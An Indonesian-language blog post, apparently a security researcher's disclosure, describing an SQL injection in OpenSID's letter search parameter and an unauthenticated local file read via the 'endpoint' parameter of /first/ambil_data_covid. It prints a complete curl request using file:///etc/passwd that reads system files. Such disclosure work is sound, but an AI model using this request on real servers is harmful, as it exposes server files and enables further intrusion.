Halaman

    Social Items

Multiple vulnerable at OpenSID.

   Selamat siang, sudah lama saya tidak membuat artikel lagi, kali ini saya akan membahas vulnerable yang ada pada CMS OpenSID.

   OpenSID adalah Sistem Informasi Desa (SID) yang sengaja dirancang supaya terbuka dan dapat dikembangkan bersama-sama oleh komunitas peduli SID. OpenSID awalnya dikembangkan menggunakan SID dari Combine Resource Institution (CRI). SID CRI terakhir yang telah digabung dengan OpenSID adalah SID 3.10 yang diperoleh dari teman-teman di https://www.facebook.com/groups/OpenSID pada tanggal 15 Pebruari 2017.




 1. Authentication SQL Injection.

     Hal pertama yang saya temukan adalah sql injection pada bagian surat, lebih rincinya ada pada url pencarian surat. ini saya temukan ketika mencoba melakuka RCE tapi karna beberapa hal jadi saya ubah ke SQL Injection.
   
   Vulnerable param nya terletak pada parameter "q".
   example:
     localhost/surat/list_penduduk_ajax?q=[SQLI]&page=1&filter_sex=
   ketika saya melihat source code nya.
SQLINJECTION

2. Local File Read.

   Setelah beberapa hari kemudian saya mencoba kembali melakukan test pada keamanan OPENSID kali ini saya mencoba mencari di halaman depan/unauthentication.

   Di kesempatan kali ini saya mencoba beberapa hal seperti XSS, SQLI dan SSTI tapi tidak ada respone sama sekali :( tapi pada saat saya hampir menyerah saya melihat 1 hal, yaitu "papan informasi COVID-19", karna penasaran saya pun membuka network dan melihat lintas API dari mana data itu berasal dan apakah bisa di exploitasi ?, tanpa pikir lama saya mencobanya dan saya menemukan hal parameter yang menarik, parameter "endpoint" yang terletak di url "/first/ambil_data_covid" ini menarik perhatian saya, tanpa lama, saya langsung mencoba untuk melakukan request ke google dari request "/ambil_data_covid".

curl 'https://localhost/first/ambil_data_covid' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://localhost' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: https://localhost/first' -H 'Cookie: sidcsrf=token; ci_session=token' --data-raw 'endpoint=file:///etc/passwd&sidcsrf=token'

Dan boom saya mendapatkan File sensitif /etc/passwd dan setelah saya cek source code nya ternyata memang tidak ada filter sama sekali. dan ini juga memungkinkan untuk mengarahkannya ke server side request forgery.
Local File Read

Mungkin itu saja cerita dari saya, mohon maaf bila ada kesalahan kata atau kesalahan lainnya.
Terima kasih.

Tidak ada komentar